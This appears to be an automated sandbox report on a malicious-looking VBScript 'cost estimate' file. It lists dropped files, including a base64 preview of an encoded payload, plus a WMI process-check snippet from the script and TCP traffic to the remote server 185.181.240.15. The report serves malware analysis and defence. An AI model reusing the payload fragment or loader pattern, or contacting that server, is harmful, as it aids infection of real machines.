                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:Nlllulbnolz:NllUc
                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e................................................@..........

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar1xfkvw.0r3.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bn4i2qzd.up3.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsvimkjj.k0z.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjevjoqm.b0s.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Roaming\Commandoes.Gre

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):475360
                                          Entropy (8bit):5.845607994188485
                                          Encrypted:false
                                          SSDEEP:12288:6EZrX/owfsLnMeSsaSzqg/KA9o3IHrFIL:6QgwsauVK/kFIL
                                          MD5:B96928578115B1191B03CAE7B3845CA1
                                          SHA1:F428A8A24FA8D5B18BCF369C420E3CFC95BB532F
                                          SHA-256:299B31AD6705B0195D90DB6CDF9B12268976E4F7C0ABC89EA3B128F8B3932D50
                                          SHA-512:98926A2DFE28857946183248CBEECA4FD1BDAA4BED8B5BE6FB411A468D105CD61089F0D9FC00A147649EA3447E0DEE658BF601437C9CC5A3FFCD7CE4426E2E00
                                          Malicious:false
                                          Preview:cQGbcQGbu9v8CgBxAZtxAZsDXCQEcQGb6wJGtLlK9eTn6wK073EBm4Hx3nqphHEBm+sCYwiB8ZSPTWPrAp/86wJrU+sCFRLrAusmuo1bJChxAZvrAvOXcQGbcQGbMcrrArqQcQGbiRQLcQGb6wK5mdHicQGb6wLTW4PBBOsC3r1xAZuB+eVV5wF8zHEBm+sC6HWLRCQEcQGb6wLfLInD6wLShOsCAqqBw6ydvAHrArFacQGbum9vlFdxAZvrAj5rgfJBGO3X6wIrIesCKTeB8i53eYBxAZtxAZvrAsFrcQGbcQGbcQGbiwwQ6wIb5HEBm4kME3EBm+sCFotCcQGbcQGbgfoAAAUAddfrAtJZ6wJRcolcJAxxAZvrAj7Ege0AAwAAcQGb6wJiDYtUJAhxAZvrAm2Si3wkBHEBm3EBm4nrcQGb6wJGgYHDnAAAAHEBm+sCGa1TcQGb6wKnjmpA6wJ3YHEBm4nrcQGb6wIvjMeDAAEAAABg9QHrAi3EcQGbgcMAAQAAcQGbcQGbU3EBm+sCWASJ6+sC+l5xAZuJuwQBAADrAia56wL18IHDBAEAAOsC9YTrAvDeU3EBm3EBm2r/6wKbIusCd46DwgXrAhoz6wJ0mDH26wL3yusCwdQxyXEBm+sC6nyLGnEBm3EBm0FxAZvrApPCORwKdfPrAq/w6wK+rkbrAgvTcQGbgHwK+7h13OsCENhxAZuLRAr86wJIdHEBmynw6wJVWOsCszf/0nEBm3EBm7oAAAUA6wKOOnEBmzHAcQGb6wKEpYt8JAxxAZtxAZuBNAcVpZJkcQGb6wIqp4PABOsCf/JxAZs50HXkcQGbcQGbiftxAZtxAZv/1+sCg6RxAZv9pZJkFV3J4M+dS1z6LHfl+aufpRckVmofZJAxnEArwZkbm+XkA3eTZiRTJMozEeXk/tqE6GLWaRUNZIirTqDR7JXzZlyBk3tAAMXyAxtCsKBKUuKIwfbxoFyiBRfstmUK8Dcz

                                          Static File Info

                                          General

                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.106425371862993
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:Kostenvoranschlag.vbs
                                          File size:158'579 bytes
                                          MD5:080a163f1709fc1834429846644abf60
                                          SHA1:998d9f5a1e0c00788d623cec753e34180135eb0c
                                          SHA256:50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
                                          SHA512:94cf9a367b1950cf55441de043dcb23c498d9cbf89fcb677a71498072be9144bedb5b2bc01cef5de9fb9c7ea4a82d2edea17816bc44ef3aca674dd481c46c5ef
                                          SSDEEP:3072:MYiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqnzy:LiHtveXendAy3yrslay3tJuj8Sq2qb0k
                                          TLSH:A2F34FD3C9C92A588A461A73DD136B370EA0004E7B2B5F78A3BDC95D658394C59BFBC0
                                          File Content Preview:......Set Pizzabarerne = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Forskudtes = Pizzabarerne.ExecQuery("Select * from Win32_Process Where Name = 'Kvartalets.exe'")....For Each Ultrasonicated in Forskudtes....for Puncher1

                                          File Icon

                                          Icon Hash:68d69b8f86ab9a86

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 24, 2024 15:20:06.435748100 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:06.435825109 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:06.435972929 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:06.444277048 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:06.444309950 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.361418009 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.361534119 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.468250036 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.468293905 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.469433069 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.492666006 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.539356947 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.765680075 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.913630009 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.913695097 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.913770914 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.913861990 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.913908958 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.913923979 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.913950920 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915507078 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915546894 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915565014 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915575981 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915601969 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915636063 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915636063 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915643930 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915664911 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915687084 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915707111 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915728092 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:07.915750980 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:07.915750980 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.036786079 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.061610937 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061645031 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061681032 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061697960 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061717987 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061717987 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.061738968 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061791897 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.061830997 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.061894894 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063004971 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063026905 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063057899 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063061953 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063074112 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063093901 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063112020 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063114882 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063116074 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063138008 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063143015 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.063158035 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.063191891 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.065836906 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.065856934 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.065893888 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.065916061 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.065962076 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.065975904 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.066029072 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.067766905 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.067810059 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.067838907 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.067853928 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.067888021 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.067908049 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.209175110 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.209203005 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.209280014 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.209350109 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.209388018 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.209412098 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.210186005 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.210206032 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.210283041 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.210299969 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.210359097 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.210894108 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.210912943 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.210963011 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.210983038 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.211024046 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.211042881 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.213944912 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.213968039 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214026928 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214040041 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214066982 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214096069 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214911938 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214929104 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.214975119 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.214987040 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.215012074 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.215030909 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327580929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327605963 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327687025 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327756882 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.327801943 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.327826977 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.328053951 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328073025 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328151941 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.328166962 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.328221083 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356703997 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356767893 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356836081 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356906891 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.356959105 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.356959105 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.357821941 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.357877970 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358028889 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358028889 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358103037 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358156919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358177900 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358195066 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358233929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358268976 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358305931 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358306885 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.358320951 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.358401060 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446358919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446422100 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446551085 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446551085 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446583033 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446608067 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446638107 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446647882 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446667910 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446681976 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446698904 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446711063 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.446748018 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.446779013 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475220919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475265026 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475325108 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475383043 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475421906 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475447893 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.475930929 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.475982904 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476020098 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476032972 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476068020 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476089954 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476341963 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476385117 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476429939 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476443052 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476470947 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476490021 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476839066 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476880074 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476922035 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.476933956 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.476984024 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.477004051 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565311909 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565380096 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565515041 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565515041 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565553904 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565568924 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565620899 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565635920 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565649033 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.565681934 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.565711975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594168901 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594187021 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594369888 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594403982 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594474077 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594646931 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594702959 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594736099 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594752073 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.594784975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.594806910 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595210075 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595248938 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595292091 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595304966 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595367908 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595367908 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595695019 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595735073 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595767975 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595782995 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.595817089 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.595838070 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683763981 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683813095 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683868885 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683893919 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.683923006 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.683962107 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.684099913 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.684266090 CEST44349700185.181.240.15192.168.2.7
                                          Oct 24, 2024 15:20:08.684331894 CEST49700443192.168.2.7185.181.240.15
                                          Oct 24, 2024 15:20:08.687810898 CEST49700443192.168.2.7185.181.240.15

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 24, 2024 15:20:02.173819065 CEST5557453192.168.2.71.1.1.1
                                          Oct 24, 2024 15:20:02.189188004 CEST53555741.1.1.1192.168.2.7
                                          Oct 24, 2024 15:20:06.272562027 CEST5270653192.168.2.71.1.1.1
                                          Oct 24, 2024 15:20:06.430505037 CEST53527061.1.1.1192.168.2.7

                                          DNS Queries

